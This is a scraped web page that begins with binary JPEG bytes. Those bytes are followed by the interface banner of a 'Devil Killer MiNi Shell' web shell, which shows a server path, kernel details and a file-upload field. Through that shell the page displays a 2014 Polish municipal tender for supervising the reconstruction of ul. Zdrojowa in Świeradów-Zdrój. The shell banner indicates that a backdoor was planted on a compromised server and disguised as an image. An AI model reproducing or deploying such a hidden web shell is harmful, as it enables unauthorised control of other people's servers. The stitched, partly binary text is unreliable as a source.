JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140218/32089-N-2014.html

<p class="kh_header"><b>Świeradów-Zdrój: Pełnienie nadzoru inwestorskiego przy zadaniu inwestycyjnym pn.: Przebudowa ul. Zdrojowej w celu poprawy funkcji uzdrowiskowej miasta Świeradów-Zdrój</b><br>
<b>Numer ogłoszenia: 32089 - 2014; data zamieszczenia: 18.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy zadaniu inwestycyjnym pn.: Przebudowa ul. Zdrojowej w celu poprawy funkcji uzdrowiskowej miasta Świeradów-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia Pełnienie nadzoru inwestorskiego przy zadaniu inwestycyjnym pn.: Przebudowa ul. Zdrojowej w celu poprawy funkcji uzdrowiskowej miasta Świeradów-Zdrój. Do obowiązków Wykonawcy należy świadczenie usług nadzoru inwestorskiego w imieniu  i na rzecz Zamawiającego,  zgodnie  z wymogami :
a)ustawy z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm. 
b)ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami Dz.U.03.162.1568, Rozporządzeniem Ministra Kultury z dnia 27 lipca 2011 r. w sprawie prowadzenia prac  konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich,  badań architektonicznych i  innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. Nr 165 poz. 987).
	2.Przedmiot zamówienia usługi nadzoru inwestorskiego  obejmuje:
a)pełnienie nadzoru inwestorskiego w specjalności  drogowej w ograniczonym zakresie, oraz  koordynatora nadzoru inwestorskiego,
b)pełnienie nadzoru inwestorskiego w specjalności konstrukcyjno-budowlanej w ograniczonym zakresie,
c)pełnienie nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń:  wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych w  ograniczonym zakresie,
d)pełnienie nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w ograniczonym zakresie, 
3. W przypadku niejasności w zakresie praw i obowiązków Wykonawcy ustala się, iż celem niniejszej usługi jest stworzenie kompleksowego efektywnego systemu nadzoru inwestorskiego procesu inwestycyjnego realizowanego w ramach projektu pn.: Przebudowa ul. Zdrojowej w celu poprawy funkcji uzdrowiskowej miasta Świeradów-Zdrój. Wykonawca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować inwestycje tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji inwestycji, w szczególności poprzez: 
3.1. kompleksowe zapoznanie się z :
a) umową o dofinansowanie projektu ..................nazwa, w szczególności z wnioskiem o dofinansowanie stanowiącym załącznik do w/w umowy, 
b) dokumentacją projektową dotyczącą inwestycji wraz ze wszystkim uzgodnieniami, decyzjami, postanowieniami, warunkami technicznymi, kosztorysami inwestorskimi,
c) ofertą Wykonawcy, umowami o roboty budowlane/dostawy/usługi, SIWZ, STWiORB,
co zostanie potwierdzone pisemnym oświadczeniem Wykonawcy złożonym Zamawiającemu najpóźniej w dniu przekazania placu budowy.
3.2. weryfikacja i zatwierdzenie Arkuszu podziału kwoty ryczałtowej wraz z podziałem na płatności , kosztorysu ofertowego  w ciągu 3 dni roboczych od przedłożenia przez Wykonawcę robót budowlanych co zostanie potwierdzone pisemnym oświadczeniem Wykonawcy o zgodności z  dokumentacją projektową i  SIWZ,
3.3.weryfikacja i zatwierdzenie Planu bezpieczeństwa 
i ochrony zdrowia na budowie, co zostanie potwierdzone pisemnym oświadczeniem Wykonawcy złożonym Zamawiającemu w ciągu 3 dni roboczych od przedłożenia go przez Wykonawcę robót budowlanych,
3.4.przeprowadzenie inspekcji terenu budowy w celu sprawdzenia zgodności stanu istniejącego  z dokumentacją projektową i przedłożenie Zamawiającemu oświadczenia o zgodności/niezgodności z dokumentacją projektową w terminie przekazania placu budowy Wykonawcy robót budowlanych.
3.5. przedłożenie Zamawiającemu oświadczenia o uzyskaniu/nie uzyskaniu od Wykonawcy robót budowlanych zatwierdzonego projektu tymczasowej organizacji ruchu na drogach gminnych zgodnego z wytycznymi Zamawiającego, w terminach wynikających z umowy  o roboty budowlane, w ciągu 3 dni roboczych od przedłożenia/nie  przedłożenia przez Wykonawcę robót budowlanych,
3.6.  przedłożenie Zamawiającemu oświadczenie o uzyskaniu/nie uzyskaniu od Wykonawcy robót budowlanych pisemnych oświadczeń właścicieli/ użytkowników urządzeń podziemnych na terenie inwestycji o przyjęciu nadzoru nad realizowanymi robotami w terminach wynikających z umów o roboty budowlane, w ciągu 3 dni roboczych od przedłożenia/nie  przedłożenia przez Wykonawcę robót budowlanych,
3.7. ustalenie z Wykonawcą robót budowlanych rodzajów i wzorów dokumentów dotyczących realizacji umowy oraz sposób ich obiegu, z uwzględnieniem wzorów dokumentów obowiązujących dla Projektu współfinansowanego z RPO WD na lata 2007-2013.
3.8. wykonywanie pełnego zakresu czynności jaki dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.), ustawa z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami Dz. U.03.162.1568, rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych Dz.U.Nr165,poz.987,  w szczególności poprzez:
a) reprezentowanie Zamawiającego na budowie, pełnienie funkcji koordynacyjnych;
b) zorganizowanie przekazania placu budowy i dziennika budowy Wykonawcy robót budowlanych w obecności przedstawiciela Zamawiającego i sporządzenie protokołu z tej czynności i przekazanie niezwłocznie Zamawiającemu,
c) pisemne akceptowanie materiałów przeznaczonych do wbudowania w terminie 3 dni od przedłożenia przez Wykonawcę robót budowlanych celem zapobiegania stosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie; wszelkie zastosowane materiały budowlane na zadaniu inwestycyjnym muszą być nowe, nieużywane, oraz winny odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U., Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej.
d) sprawowanie kontroli zgodności realizacji zadania inwestycyjnego, z obowiązującymi przepisami i polskimi normami, zasadami wiedzy technicznej, z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, pozwoleniem na budowę, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a  Województwem Dolnośląskim, umowami o wykonanie robót budowlanych, dotyczącymi  realizacji zadań inwestycyjnych, zawartymi pomiędzy Zamawiającym a Wykonawcami, 
e) sprawdzanie jakości wykonywanych robót i zastosowanych materiałów/wyrobów , a w  szczególności zapobieganie zastosowaniu  materiałów wadliwych, niepełnowartościowych; inicjowanie na żądanie Zamawiającego lub z własnej inicjatywy prób, badań, oględzin,
f) kontrolę prawidłowości prowadzenia Dziennika Budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
g) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
h)  stwierdzanie wystąpienia wady w toku realizacji inwestycji,potwierdzanie usunięcia wad występującej w toku realizacji inwestycji przez Wykonawcę robót budowlanych, w terminie 3 dni od zawiadomienia o usunięciu wady,
i) sprawdzania właściwego oznakowania pracowników  Wykonawcy robót budowlanych i podwykonawców i kolejnych podwykonawców oraz  obowiązek ujawniania  Zamawiającemu  podwykonawców i kolejnych podwykonawców wykonawcy robót budowlanych, celem  zagwarantowania właściwego rozliczenia  finansowego przyjętego  przez Zamawiającego w umowach na roboty budowlane nadzorowanych inwestycji ;potwierdzanie  i rozliczenie  zakresu robót wykonanych przez podwykonawców i kolejnych podwykonawców wykonawcy robót budowlanych,
j) inicjowanie na żądanie Zamawiającego lub z własnej inicjatywy narad koordynacyjno-technicznych związanych z realizacją inwestycji;organizowanie i uczestniczenie minimum dwa razy w miesiącu w naradach odbywających się w siedzibie Zamawiającego - obecność obowiązkowa koordynatora nadzoru inwestorskiego i inspektorów branżowych realizujących aktualnie realizowane zadania, jednak nie rzadziej niż to wynika z charakteru zawartej między stronami umowy i obowiązujących przepisów.
k) wydawanie kierownikowi budowy lub kierownikowi robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących  :
k1) usunięcia nieprawidłowości lub zagrożeń,
k2) wykonywania prób  lub badań, także  wymagających odkrycia  robót  lub elementów zakrytych,
k3)sporządzania i przedstawiania  Zamawiającemu opinii dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania  w budownictwie wyrobów  oraz urządzeń technicznych,
l) potwierdzenie faktycznie wykonanych robót/usług/dostaw, usunięcia wad,
ł) żądanie od kierownika budowy lub kierownika robót :
ł1) dokonania poprawek bądź ponownego  wykonania wadliwe wykonanych  robót budowlanych,
ł2) wstrzymania dalszych robót budowlanych  w przypadku, gdyby ich kontynuacja  mogła stwarzać  zagrożenie,  bądź spowodować niedopuszczalną niezgodność z umową, projektem  lub pozwoleniem na budowę,
m) niezwłoczne zawiadamianie Zamawiającego w formie protokołu konieczności wraz z uzasadnieniem, jeżeli w okresie  realizacji robót :
m1)zajdzie konieczność wykonywania robót  dodatkowych /zamiennych; bez zgody Zamawiającego, Wykonawca nie jest uprawniony do wydawania wiążących poleceń wykonawcy robót budowlanych w zakresie wykonania  robót  dodatkowych /zamiennych,
m2) jeżeli pojawi się alternatywa dla przyjętych rozwiązań projektowych będących podstawą wykonania robót budowlanych; bez zgody Zamawiającego  Wykonawca nie jest uprawniony do podejmowania decyzji dotyczących zmian w projekcie, 
m3) jeżeli zajdzie konieczność wykonywania robót niezbędnych ze względu na bezpieczeństwo lub zabezpieczenie przed awarią; Wykonawca zobowiązany jest w takiej sytuacji podjąć niezbędne kroki w celu zażegnania niebezpieczeństwa lub awarii, jednak bez zgody Zamawiającego  Wykonawca nie jest uprawniony do podejmowania decyzji dotyczących zmian w projekcie, nie jest uprawniony do wydawania wiążących poleceń wykonawcy robót budowlanych w zakresie wykonania  robót  dodatkowych /zamiennych,
n) rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót a w razie potrzeby, wprowadzanie ich do realizacji (rysunki zamienne lub wpis do Dziennika Budowy); kompletowanie  dokumentacji z naniesionymi  poprawkami  projektanta na dokumentacji projektowej, prób technicznych, itp. wynikających z prawa budowlanego i norm branżowych,
o) koordynacja robót budowlanych poszczególnych branż,
p) stwierdzanie gotowości do odbiorów robót zanikowych, odbiorów częściowych i końcowych wpisem do Dziennika Budowy oraz pisemne poinformowanie o tym fakcie Zamawiającego; W ramach odbiorów o których mowa w zdaniu poprzednim dokonywane będą odbiory robót podwykonawcy i dalszych podwykonawców, których przedmiotem będzie potwierdzenie  zakresu wykonanych robót przez podwykonawców i dalszych podwykonawców.
r) dokonywanie odbiorów robót ulegających zakryciu lub zanikowi poprzez:
r1) sprawdzanie, potwierdzanie  robót ulegających zakryciu lub zanikowi i sporządzenie na tą okoliczność protokołu odbioru robót ulegających zakryciu lub zanikowi, w terminie 48 godzin od zgłoszenia przez  Wykonawcę robót budowlanych;
r2) W przypadku nie stawienia się Wykonawcy  w terminie o którym mowa w punkcie  r1)  Wykonawca robót budowlanych może kontynuować prace, a koszty przeprowadzenia ewentualnych prób i robót związanych z usunięciem ujawnionych nieprawidłowości, które powstały na skutek zaniechania Wykonawcy  obciążają Wykonawcę,
r3) W przypadku zakrycia robót podlegających odbiorowi i nie powiadomienia Wykonawcy  przez wykonawcę robót budowlanych, Wykonawca nie pozostaje w zwłoce.
s) dokonywanie odbiorów robót częściowych poprzez organizowanie prac Komisji Odbiorowej Zamawiającego i sporządzanie wszystkich dokumentów  tym związanych:
- sprawdzenie kompletności dokumentacji odbiorowej i w terminie 5 dni złożenie Komisji Odbiorowej Zamawiającego i Wykonawcy oświadczenia o kompletności dokumentacji odbiorowej i wyznaczenie terminu rozpoczęcia odbioru lub oświadczenia o braku kompletności dokumentacji odbiorowej, jeżeli stwierdzi brak niezbędnych dokumentów do dokonania odbioru, odmawia dokonania odbioru do czasu uzupełnienia dokumentów  i wyznacza termin uzupełnienia dokumentów, 
- Komisja Odbiorowa Zamawiającego zobowiązana jest do dokonania odbioru lub odmowy dokonania odbioru w terminie 5 dni od dnia rozpoczęcia odbioru lub uzupełnienia dokumentów.
- sporządzenie protokołów odbioru częściowego dla Komisji Odbiorowej Zamawiającego, który będzie zawierał wszystkie ustalenia i zalecenia poczynione w trakcie odbioru, wraz z uzyskaniem podpisów członków komisji.
t) dokonywanie odbiorów końcowych robót poprzez organizowanie prac Komisji Odbiorowej Zamawiającego i sporządzanie wszystkich dokumentów z tym związanych:
t1) sprawdzenie kompletności dokumentacji odbiorowej i w terminie 5 dni złożenie Komisji Odbiorowej Zamawiającego i Wykonawcy oświadczenia o kompletności dokumentacji odbiorowej i wyznaczenie terminu rozpoczęcia odbioru lub oświadczenia o braku kompletności dokumentacji odbiorowej, jeżeli stwierdzi brak niezbędnych dokumentów do dokonania odbioru, odmawia dokonania odbioru do czasu uzupełnienia dokumentów  i wyznacza termin uzupełnienia dokumentów. Wykonawca zobowiązany jest do dokonania lub odmowy dokonania czynności, o których mowa w zdaniu poprzednim w terminie do 5 dni od otrzymania zgłoszenia Wykonawcy do odbioru końcowego lub w terminie 5 dni od otrzymania od Wykonawcy uzupełnionych dokumentów nie dłużej jednak niż do dnia określonego w umowie o roboty budowlane,
t2) Komisja Odbiorowa Zamawiającego z czynności odbioru sporządzi w terminie  5 dni protokół końcowy,nie dłużej jednak niż do dnia określonego w umowie o roboty budowlane  ostatecznego odbioru końcowego lub odmowy dokonania odbioru końcowego, który zawierać będzie wszystkie ustalenia i zalecenia poczynione w trakcie odbioru,
u) obowiązek przygotowywania  i składania Zamawiającemu  comiesięcznych pisemnych sprawozdań o wszelkich problemach i zagrożeniach, istotnych z punktu widzenia realizacji inwestycji, które Wykonawca powinien przewidywać, kierując się posiadaną wiedzą techniczną i doświadczeniem zawodowym, z przebiegu oraz z realizacji inwestycji - obowiązek przekazania sprawozdania do 5-go każdego miesiąca w zakresie m.in.:
u1) wskazania wszelkich zagrożeń, problemów, kolizji dotyczących inwestycji (min. w zakresie dotrzymania terminu wykonania, sprawnej realizacji inwestycji),
u2) wskazania wszelkich niezgodności realizacji inwestycji z dokumentacją projektową,
u3) wskazania wszelkich czynników mogących prowadzić do konieczności wprowadzenia zmian w umowie.
w) sporządzanie przedmiotowych sprawozdań nie wyklucza pozostałych obowiązków bieżącego informowania Zamawiającego o przebiegu realizacji nadzorowanej inwestycji (jednocześnie Zamawiający informuje, iż w przypadku gdyby w opinii Wykonawcy dana inwestycja nie była w żaden sposób zagrożona, jest on również zobowiązany do przygotowania sprawozdania, w którym powinien zawrzeć swoją opinię),
3.9. Obowiązki o których mowa powyżej wykonywane będą poprzez pobyt personelu Wykonawcy, o którym mowa w § 5 odpowiednio do potrzeb wynikających z toku budowy jednak nie rzadziej niż dwa razy w tygodniu, w tym raz w godzinach pracy Urzędu. Pobyt musi być udokumentowany wpisem  na listę obecności prowadzonej w siedzibie Zamawiającego. W razie potrzeby Koordynator będzie wzywał inspektora danej branży w trybie pilnym na plac budowy w celu rozwiązania problemów pojawiających się pomiędzy radami budowy, na których obecny będzie pełen skład inspektorów. O fakcie wezwania Inspektora Nadzoru Koordynator będzie informował Zamawiającego. 
3.10. Ponadto Wykonawca   zobowiązany będzie do uczestnictwa  w przeglądach rocznych i awaryjnych  wynikłych z rękojmi  i gwarancji  w terminach  od dnia rozpoczęcia okresów gwarancji i rękojmi oraz  wynikających  z  konieczności złożenia  wyjaśnień w związku ze złożeniem przez Zamawiającego wniosków o  płatność oraz udzielenie  wyjaśnień, w tym w ramach prowadzonych kontroli i audytów , w okresie trwałości  projektu.
3.11. wyegzekwowanie od wykonawcy robót budowlanych sporządzenia karty gwarancyjnej i instrukcji użytkowania i eksploatacji obiektu.
3.12. sporządzenie i przekazanie Zamawiającemu harmonogramu przeglądów wynikających z: uzyskanej od wykonawcy robót budowlanych karty gwarancyjnej i instrukcji użytkowania i eksploatacji wybudowanych obiektów, udzielonych przez producentów gwarancji na zabudowane materiały i urządzenia, rękojmi na wybudowane obiekty.
3.13.Wykonawca dokona podziału do celów rozliczeniowych ceny  ryczałtowej podanej w przyjętej ofercie,  w terminie uzgodnionym z Zamawiającym, który polegać będzie  na   podziale ceny ryczałtowej na ceny odnoszące się do nadzorowanych  poszczególnych zadań  inwestycyjnych  nr 1,2,3,4,5,6,7,8  - wprost proporcjonalnie do podziału jakiego dokonał Wykonawca robót budowlanych w  Arkuszu podziału kwoty ryczałtowej wraz z podziałem na płatności.

4. Pełnienie nadzoru inwestorskiego nad przedmiotowym zadaniem polegać będzie na objęciu nadzorem przebudowy drogi stanowiącej ul. Zdrojową (dł. 393 mb, pow. ok. 6000 m2), zlokalizowanej na nieruchomościach oznaczonych geodezyjnie jako działki nr: 1, 15, 18, 19, 39, 40, 45, am. 6, Obr. IV;  44, 46/1, 51, 70, 71/2, am. 9, Obr. IV. Przedmiot zamówienia zawiera następujące zadania:

Zadanie nr 1 - Przebudowa jezdni, chodników i pozostałych elementów architektonicznych ul. Zdrojowej
Zadanie nr 2 - Budowa fontanny wraz z przyłączami
Zadanie nr 3 - Budowa kanalizacji deszczowej w ul. Zdrojowej
Zadanie nr 4 - Budowa oświetlenia drogowego wraz z iluminacjami w ul. Zdrojowej
Zadanie nr 5 - Budowa poidełek z wodą mineralną wraz z przyłączami:
Zadanie nr 6 - Budowa kanalizacji sanitarnej w ul. Zdrojowej
Zadanie nr 7 - Wymiana sieci wodociągowej w ul. Zdrojowej wraz z przyłączami:
Zadanie nr 8 - Budowa instalacji monitoringu w ul. Zdrojowej
Szczegółowo zakres zadań opisany jest w SIWZ.
Przy wycenie oferty należy uwzględnić że:
a) zmiany w zakresie wykonywania nadzorowanych robót budowlanych wprowadzone przez Zamawiającego w  UWAGACH DLA WYKONAWCY ROBÓT BUDOWLANYCH i wszystkie zmiany i odpowiedzi na pytania umieszczone w przetargu na roboty budowlane objęte nadzorem, umieszczone na stronie bip.umswieradowzdroj.nv.pl  ,
b) wszystkie obowiązki uczestników procesu budowlanego wynikające z prawomocnej decyzji określającej środowiskowe uwarunkowania realizacji  przedsięwzięcia dotyczącego poprawy zagospodarowania centrum Uzdrowiska Świeradów-Zdrój, obejmującej swym zakresem także przebudowę ul. Zdrojowej (skan decyzji w załączeniu),
c) Ulica Zdrojowa stanowi centrum miejscowości (strefa ochrony uzdrowiskowej A), tworząc oś, wokół której zlokalizowane są najważniejsze atrakcje turystyczne miasta (Dom Zdrojowy z Halą Spacerową, parki zdrojowe) oraz obiekty związane z lecznictwem uzdrowiskowym (Zakład Radonowy, Łazienki Leopolda - obecnie Szpital Uzdrowiskowy Goplana, Łazienki Marii - obecnie Zakład Kuracji Borowinowej). Miejscowość jako założenie urbanistyczne jest wpisana do rejestru zabytków. Należy również wziąć pod uwagę fakt, iż przy ul. Zdrojowej:
- zamieszkuje na stałe około  200 mieszkańców,
- w sposób ciągły, swoją działalność prowadzi ok. 75 podmiotów gospodarczych z branż: hotelarskiej, spożywczej, gastronomicznej, opieki zdrowotnej, handlowej, usługowej itp. 
W związku z całkowitym wyłączeniem z ruchu kołowego ulicy Zdrojowej ww. użytkownikom Wykonawca robót budowlanych zobowiązany jest zapewnić bezpieczne pod względem technicznym (np. poprzez zamontowanie kładek pieszych typu U-28) dojście do budynków mieszkalnych i lokali o których mowa w zdaniu poprzednim oraz zapewnić możliwość świadczenia usług w sposób ciągły. Dostarczenie towarów będzie się odbywało z ulic przyległych i krzyżujących się z ulicą Zdrojową.

5. Zadanie nr 1, 2, 3, 4, 5 - Projekt jest dofinansowany ze środków Unii Europejskiej w ramach Priorytetu nr 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i kultura ),Działania 6.1 Turystyka uzdrowiskowa Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,
Zadanie nr 7 - Zamawiający ubiega się o dofinansowanie ze środków  Unii Europejskiej  w ramach Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.

6.  Cel zamówienia/projektu:
Miasto Świeradów-Zdrój jest miejscowością uzdrowiskową położoną w Górach Izerskich, którą co roku odwiedza około 30 tys. turystów i kuracjuszy. Ze względu na położenie geograficzne i posiadane bogactwa naturalne rozwój całej gminy ściśle powiązany jest z rozwojem branży uzdrowiskowo - turystycznej (generuje ona większość dochodów podatkowych gminy, jak również zatrudniona jest w niej dominująca część mieszkańców gminy Świeradów-Zdrój i innych gmin ościennych). Strategicznym przedsięwzięciem z punktu widzenia dalszego rozwoju miasta jest przekształcenie ulicy Zdrojowej w deptak uzdrowiskowy. Ulica Zdrojowa stanowi centrum miejscowości (strefa ochrony uzdrowiskowej A), tworząc oś, wokół której zlokalizowane są najważniejsze atrakcje turystyczne miasta (Dom Zdrojowy z Halą Spacerową, parki zdrojowe) oraz obiekty związane z lecznictwem uzdrowiskowym (Zakład Radonowy, Łazienki Leopolda - obecnie Szpital Uzdrowiskowy Goplana, Łazienki Marii - obecnie Zakład Kuracji Borowinowej). 
Realizacja projektu przebudowy ulicy Zdrojowej mający na celu poprawę funkcji uzdrowiskowej miasta Świeradów-Zdrój. Ponadto będzie miała bezpośredni wpływ na wzrost atrakcyjności turystyczno-uzdrowiskowej Świeradowa-Zdroju wśród innych miejscowości o podobnym charakterze, przyczyni się do wzrostu jego konkurencyjności, czego oznaką będzie zwiększenie się liczby turystów oraz kuracjuszy krajowych i zagranicznych odwiedzających uzdrowisko. Inwestycja powyższa umożliwi dalsze pozyskiwanie inwestorów, rozwój istniejących struktur przedsiębiorczości, utrzymanie istniejących oraz tworzenie nowych miejsc pracy. 

7.  Wykonawca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować zamówienie tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji zamówienia.
